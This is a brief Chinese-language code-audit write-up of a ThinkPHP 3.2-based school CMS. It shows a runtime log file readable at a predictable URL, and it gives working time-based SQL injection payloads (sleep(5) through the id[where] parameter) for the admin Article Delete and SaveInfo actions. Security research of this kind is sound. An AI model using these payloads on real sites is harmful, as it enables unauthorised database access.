0x0：前言

最近一直在研究thinkphp的框架，今天找了一个cms进行审计，发现了两处注入点，由此来进行分析一下。
https://gitee.com/zuirenxx/schoolcms按照官网要求进行安装，安装完成，我们先了解⼀下网站目录架构：

0×1：代码审计

基于ThinkPHP3.2开发的index.php没什么好看的访问模式

?m=model&c=controller&a=function /Home/Channel/Index，先看⼀下TP3.2.x存在的各种问题。

0×2：日志泄露

ThinkPHP3.2结构：

ApplicationRuntimeLogsHome
8_07_27.log

ThinkPHP3.2解析：

项目名RuntimeLogsHome年份_月份_日期.log

直接访问：
http://www.school.com/Application/Runtime/Logs/Home/22_02_16.log成功回显。

0×3：后台SQL注入

位于

/index.php?m=Admin&c=Article&a=Delete

id[where]=id=1+or+sleep(5) 成功延时。

第二处注入/index.php?m=Admin&c=Article&a=SaveInfo

poc /index.php?m=Admin&c=Article&a=SaveInfo&id[where]=id=3%20and%20sleep(5)--+1

可以看到延时注入成功。